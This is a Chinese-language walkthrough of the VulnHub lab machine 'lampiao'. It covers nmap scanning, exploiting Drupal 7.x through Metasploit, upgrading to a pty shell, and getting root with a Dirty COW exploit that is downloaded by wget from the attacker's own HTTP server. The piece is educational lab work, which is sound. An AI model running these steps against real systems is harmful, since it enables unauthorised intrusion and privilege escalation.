lampiao打靶思路详解(vulnhub)

lampiao打靶思路详解(vulnhub)

第一步:信息收集

nmap -sn 192.168.31.0/24 

在这里插入图片描述

确定靶机IP为192.168.31.116

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.116

结果如下

在这里插入图片描述

第二步:WEB渗透

访问http://192.168.31.116/

在这里插入图片描述

发现什么都没有

然后访问http://192.168.31.116:1898

在这里插入图片描述

通过插件可以发现是 Drupal CMS 版本为 7.x

搜索

searchsploit drupal |grep 7.  

在这里插入图片描述

我的天哪!这个CMS爆出过不少漏洞(手动狗头)

那就启动msf,因为msf里面集成了很多漏洞

msfconsole  

search drupal

在这里插入图片描述

然后就是挨个尝试了

在我使用到第二个的时候,成功了

use 1

show options

set RHOSTS 192.168.31.116

set RPORT 1898

run

在这里插入图片描述

第三步:后渗透

直接通过msf进行后渗透

进入交互环境

shell

然后用python增强交互环境

python -c "import pty;pty.spawn('/bin/bash')"

查看用户

id

查看环境,看看能不能用脏牛进行提权

uname -a

g++ -v

在这里插入图片描述

感觉差不多,那就上脏牛!!!

本机启动python http服务

python -m http.server 8000

在这里插入图片描述

下载playload

wget http://192.168.31.178:8000/dcow.cpp

wget http://192.168.31.178:8000/makefile

然后编译,执行

make

./dcow

在这里插入图片描述

成功!!!

之后就简单了

进入root目录。获得flag

在这里插入图片描述

至此完结,撒花。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值